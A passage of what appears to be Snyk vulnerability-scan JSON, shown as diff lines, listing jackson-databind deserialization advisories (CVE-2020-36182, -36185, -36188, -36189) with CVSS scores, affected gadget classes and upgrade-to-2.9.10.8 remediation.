"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3004", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-36179", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:38.913838Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.693276Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.436792Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.913838Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.693276Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36179)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36182" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:30:54.237288Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:30:00Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:35Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:24.693276Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056424", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2998", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:39.244182Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:01.307628Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.622591Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:39.244182Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:01.307628Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36185" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:36:40.536722Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:34:52Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:33.303463Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:01.307628Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056425", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[, 2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2996", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:00.658291Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.824076Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:42.513059Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:00.658291Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.824076Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36189" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:37:54.679882Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:37:04Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:33.089230Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.824076Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056426", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2996", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-36188", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:38.922274Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:03.468032Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:42.488317Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.922274Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:03.468032Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36188)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36188" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:39:28.531700Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:38:32Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:32Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:03.468032Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056427", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[, 2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[, 2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3004", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-36179", - "title": "Poc" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.854860Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.686589Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.757298Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.854860Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.686589Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The 